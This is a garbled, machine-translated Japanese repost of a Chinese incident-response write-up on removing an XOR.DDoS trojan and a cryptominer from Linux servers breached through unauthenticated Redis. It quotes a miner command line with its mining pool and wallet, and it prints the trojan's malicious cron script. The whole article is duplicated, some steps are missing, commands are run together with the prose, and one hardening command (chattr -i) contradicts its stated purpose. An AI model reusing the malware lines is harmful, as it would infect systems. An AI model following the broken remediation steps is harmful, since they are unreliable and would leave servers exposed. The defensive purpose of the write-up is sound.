Unix.Trojan.DDoS_XOR-1木馬の症状と整理方法
5783 ワード
親プロセス名:crondプロセス名:bashプロセスパス:/usr/bin/bashプロセスid:20517コマンドラインパラメータ:/bin/sh/etc/cron.hourly/cron.sh事件说明:XORDDoS木馬が侵入すると、Linuxのタイミングタスクに悪意のあるコードを植え込み、タイミングよくバックドアプログラムを起動します.この不審なプロセスを発見したとき、あなたの機械が侵入されたか悪意のある発注の状態にある可能性があります.contabと自己起動項目をタイムリーに整理することをお勧めします.ヘルプドキュメント:https://help.aliyun.com/knowledge_detail/36279.htmlソリューション:計画タスクの悪意のあるコードを直ちにクリーンアップすることをお勧めします.親プロセス名:bashプロセス名:nohupプロセスパス:/usr/bin/nohupプロセスid:12283コマンドラインパラメータ:nohup./works -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443-u 43 ZSHb 2 kRK 4 P 386 GuQYTCyFbLmeuWrC 1 gLiUuzdK 5 KXiZPLuxPUYra 4 TC 3 p 1 TWAZxDf 9 PABYBpr 34 i 4 ha 6 UHY 4 tppzJSR 8 k-px-t 1イベント説明:ハッカーはリモートコードを利用して抜け穴を実行するか、悪意のある木馬はサーバーに掘削木馬を植え込み、機械のすべてのCPU計算資源を占有し、サーバーの正常な業務性能解決方案に深刻な影響を及ぼす:直ちにKILLこの掘削プロセスを提案する.計画タスクの悪意のあるコードをタイムリーにクリーンアップします.詳細については、次のヘルプを参照してください.https://helpcdn.aliyun.com/knowledge_detail/41206.html
ターンhttp://blog.sina.com.cn/s/blog_8b79cd290102w7k9.html
http://www.cnblogs.com/IPYQ/p/6791256.html
http://www.cnblogs.com/red-code/p/5599393.html
http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
http://blog.csdn.net/rainday0310/article/details/52327026
http://blog.csdn.net/whs_321/article/details/51734602
問題の原因
デジタルキャンパスアプリケーションのREDISキャッシュシステムにBUGが存在し、侵入者自身が生成したスプーンにサーバが注入され、RedisのDATAディレクトリにアップロードされ、最終的にサーバのroot権限を取得する
影響範囲
デジタルキャンパスで採用されたRedisバージョンにはバグがあり、すべての導入デジタルキャンパスサーバに影響を与え、すべての更新が必要である.
プロセス-修復REDIS
1、REDISバージョンの更新
2、プロファイルを修正し、「bind 127.0.0.1」コマンドを使用してREDISをローカルインタフェースのリスニングを制限する
3、REDISアクセスパスワードを有効にし、「requirepass=bluefin_redis_secret」パラメータを増加し、「bluefin_redis_secret」はデジタルキャンパス接続redisのパスワードである
プロセス-ウイルスを削除します.
1、clamavでスキャンし、感染したファイルディレクトリを確定する
EPELソースを追加し、yumでclamavをインストールしてウイルスライブラリを更新
clamavはオープンソースのウイルスライブラリ検出ツールであり、ウイルスを識別することができるが、検出能力は極めて限られており、スキャン期間中にウイルスファイルを削除するしかなく、プロセス監視と自己複製を持つウイルスには何もできない.
ルートディレクトリスキャン、影響を受けるファイルとフォルダの決定
clamavスキャンにより/usr/binディレクトリおよび/libディレクトリにウイルスファイルが表示され、最終的に/lib/libudevが発見された.soファイル、および/usr/bin/ディレクトリの下に奇妙な実行可能ファイルが表示され、ウイルスとして決定されます.
2、clamavを使用してウイルスを削除しようとしたが、無効で、clamavスキャンが終了した後、ウイルスプロセス交換プログラム名が再表示された.ウイルス実行可能ファイルは/usr/bin/ディレクトリにあり、ファイル名は10個任意です.
アルファベット組成は「/usr/bin/kesabalwnw」、/etc/initに類似する.dディレクトリには同じ名前の起動スクリプト/etc/initがあります.d/kesabalwnwは、ウイルスプログラムを自動的に起動するために使用されます.
物理的にウイルスを削除したり、ウイルスプロセスを終了したりするのは無効です.ウイルスはファイル名を交換し、繰り返し表示されます.
3、分析の結果/etc/cron.hourlyはgccを追加しました.shスクリプト
シナリオの内容は次のとおりです.
5、netstat-tulnp指令により、deamonサービスが1つ増えたことを発見し、サービス名はよく見られる「who,watch,id,ifconfig」などのキーワードで置き換えられ、強引に終了すると自動的に再起動する.linuxには一般的に存在しない.
対応するシステムサービスは、ウイルスと関係がある疑いがあります.pidが8572のプロセスを追跡するなど、straceコマンドを使用してpid追跡を行うことができます.このプロセスがどのファイルを呼び出し、どのファイルを操作したかを確認できます.
ログに「/libudev.so」の姿が見つかり、多くのdaemonサービスがウイルスによって実行されていることが確認されました.
6、ウイルスは/etc/init.dディレクトリは複数の10文字からなるinitスクリプトを確立し、スクリプトの内容はほぼそっくりで、手動rm削除
7、ウイルスは/etc/rcにある.d/{rc 0.d,rc 1.d,rc 2,d,rc 3,d,rc 4,d,rc 5.d}では、S 90とK 90で始まるソフト接続が非常に多く、リンク/etc/initが確立する.dディレクトリのウイルスinitスクリプトは、以下のコマンドで削除できます.
クリーンアップ/etc/rc.dディレクトリ、書き込み保護を追加
8、削除/lib/libudev.so/lib/libudev.so.6/libディレクトリをブラックアウトし、書き込みを禁止
9、その他のリスクの高いディレクトリの書き込み権限を禁止する
10、ウイルスが削除されないように、通常、親プロセスでウイルスファイルが物理的に削除されたことを検出した後、自動的に新しいウイルスファイルを生成する実行ウイルスプロセス名を検索する.次のコマンドでウイルスの親プロセスを特定できます.
11、親プロセスの実行権限を取り除き、/usr/binディレクトリを短縮し、ウイルスが/usr/binで新しいウイルスファイルを生成することを防止する
12.除去後のウイルスマスタープロセス
ウイルスがkillコマンドにキャプチャされたSIGAL TERMがコマンドを終了すると、/usr/binで新しいウイルスを生成しようとしますが、前のステップで/usr/binディレクトリの書き込みを禁止したため、このプロセスは失敗します.
/usr/binディレクトリで起動した親プロセスを再検出すると、ウイルスプロセスが消失していることがわかります.
13、サーバーをシャットダウンし、flushメモリに使用し、メモリに存在するウイルスプロセスをクリアします.ここではシャットダウンしなければならないので、再起動できません.サーバを再起動すると、サーバブートフェーズに必要なメモリの一部が空になり、ウイルスの完全なクリアは保証されません.
14、サーバーをオープンし、書き込み権限をオフにするディレクトリを解禁する
15、clamavを使用して再スキャンし、クリーンなウイルスファイルが残っているかどうかを確認する
転載先:https://www.cnblogs.com/zwei1121/p/7428492.html
ターンhttp://blog.sina.com.cn/s/blog_8b79cd290102w7k9.html
http://www.cnblogs.com/IPYQ/p/6791256.html
http://www.cnblogs.com/red-code/p/5599393.html
http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
http://blog.csdn.net/rainday0310/article/details/52327026
http://blog.csdn.net/whs_321/article/details/51734602
問題の原因
デジタルキャンパスアプリケーションのREDISキャッシュシステムにBUGが存在し、侵入者自身が生成したスプーンにサーバが注入され、RedisのDATAディレクトリにアップロードされ、最終的にサーバのroot権限を取得する
影響範囲
デジタルキャンパスで採用されたRedisバージョンにはバグがあり、すべての導入デジタルキャンパスサーバに影響を与え、すべての更新が必要である.
プロセス-修復REDIS
1、REDISバージョンの更新
2、プロファイルを修正し、「bind 127.0.0.1」コマンドを使用してREDISをローカルインタフェースのリスニングを制限する
3、REDISアクセスパスワードを有効にし、「requirepass=bluefin_redis_secret」パラメータを増加し、「bluefin_redis_secret」はデジタルキャンパス接続redisのパスワードである
プロセス-ウイルスを削除します.
1、clamavでスキャンし、感染したファイルディレクトリを確定する
EPELソースを追加し、yumでclamavをインストールしてウイルスライブラリを更新
yum install clamav && freshclamclamavはオープンソースのウイルスライブラリ検出ツールであり、ウイルスを識別することができるが、検出能力は極めて限られており、スキャン期間中にウイルスファイルを削除するしかなく、プロセス監視と自己複製を持つウイルスには何もできない.
ルートディレクトリスキャン、影響を受けるファイルとフォルダの決定
clamscan -r --infected /clamavスキャンにより/usr/binディレクトリおよび/libディレクトリにウイルスファイルが表示され、最終的に/lib/libudevが発見された.soファイル、および/usr/bin/ディレクトリの下に奇妙な実行可能ファイルが表示され、ウイルスとして決定されます.
2、clamavを使用してウイルスを削除しようとしたが、無効で、clamavスキャンが終了した後、ウイルスプロセス交換プログラム名が再表示された.ウイルス実行可能ファイルは/usr/bin/ディレクトリにあり、ファイル名は10個任意です.
アルファベット組成は「/usr/bin/kesabalwnw」、/etc/initに類似する.dディレクトリには同じ名前の起動スクリプト/etc/initがあります.d/kesabalwnwは、ウイルスプログラムを自動的に起動するために使用されます.
物理的にウイルスを削除したり、ウイルスプロセスを終了したりするのは無効です.ウイルスはファイル名を交換し、繰り返し表示されます.
3、分析の結果/etc/cron.hourlyはgccを追加しました.shスクリプト
シナリオの内容は次のとおりです.
#!/bin/shPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& donecp /lib/libudev.so /lib/libudev.so.6/lib/libudev.so.65、netstat-tulnp指令により、deamonサービスが1つ増えたことを発見し、サービス名はよく見られる「who,watch,id,ifconfig」などのキーワードで置き換えられ、強引に終了すると自動的に再起動する.linuxには一般的に存在しない.
対応するシステムサービスは、ウイルスと関係がある疑いがあります.pidが8572のプロセスを追跡するなど、straceコマンドを使用してpid追跡を行うことができます.このプロセスがどのファイルを呼び出し、どのファイルを操作したかを確認できます.
strace -tt -p 8572ログに「/libudev.so」の姿が見つかり、多くのdaemonサービスがウイルスによって実行されていることが確認されました.
6、ウイルスは/etc/init.dディレクトリは複数の10文字からなるinitスクリプトを確立し、スクリプトの内容はほぼそっくりで、手動rm削除
7、ウイルスは/etc/rcにある.d/{rc 0.d,rc 1.d,rc 2,d,rc 3,d,rc 4,d,rc 5.d}では、S 90とK 90で始まるソフト接続が非常に多く、リンク/etc/initが確立する.dディレクトリのウイルスinitスクリプトは、以下のコマンドで削除できます.
クリーンアップ/etc/rc.dディレクトリ、書き込み保護を追加
find . -type l -name "K90*" -o -name "S90*" |grep -v crond|xargs rm -f && chattr -R +i /etc/rc.d/8、削除/lib/libudev.so/lib/libudev.so.6/libディレクトリをブラックアウトし、書き込みを禁止
rm -f /lib/libudev.so&&chattr +i /lib9、その他のリスクの高いディレクトリの書き込み権限を禁止する
chattr -i /lib64 /bin /sbin /usr/sbin /usr/local10、ウイルスが削除されないように、通常、親プロセスでウイルスファイルが物理的に削除されたことを検出した後、自動的に新しいウイルスファイルを生成する実行ウイルスプロセス名を検索する.次のコマンドでウイルスの親プロセスを特定できます.
[root@dt0b00021 etc]# lsof -R |grep "/usr/bin"python 2197 1 root txt REG 253,0 4864 2099101 /usr/bin/pythonhiiszdvzd 2354 1 root txt REG 253,0 625729 2100934 /usr/bin/hiiszdvzdv 11、親プロセスの実行権限を取り除き、/usr/binディレクトリを短縮し、ウイルスが/usr/binで新しいウイルスファイルを生成することを防止する
chmod 000 /usr/bin/hiiszdvzdv && chattr +i /usr/bin12.除去後のウイルスマスタープロセス
ps aux|grep -i hiiszdvzdv|awk '{print $2}'|xargs kill -9ウイルスがkillコマンドにキャプチャされたSIGAL TERMがコマンドを終了すると、/usr/binで新しいウイルスを生成しようとしますが、前のステップで/usr/binディレクトリの書き込みを禁止したため、このプロセスは失敗します.
/usr/binディレクトリで起動した親プロセスを再検出すると、ウイルスプロセスが消失していることがわかります.
[root@dt0b00021 etc]# lsof -R |grep "/usr/bin"python 2197 1 root txt REG 253,0 4864 2099101 /usr/bin/python[root@dt0b00021 etc]# 13、サーバーをシャットダウンし、flushメモリに使用し、メモリに存在するウイルスプロセスをクリアします.ここではシャットダウンしなければならないので、再起動できません.サーバを再起動すると、サーバブートフェーズに必要なメモリの一部が空になり、ウイルスの完全なクリアは保証されません.
14、サーバーをオープンし、書き込み権限をオフにするディレクトリを解禁する
chattr -i -R /usr/bin /lib /lib64 /etc/init.d /etc/rc.d /usr/sbin /usr/local15、clamavを使用して再スキャンし、クリーンなウイルスファイルが残っているかどうかを確認する
clamscan -r --infected /転載先:https://www.cnblogs.com/zwei1121/p/7428492.html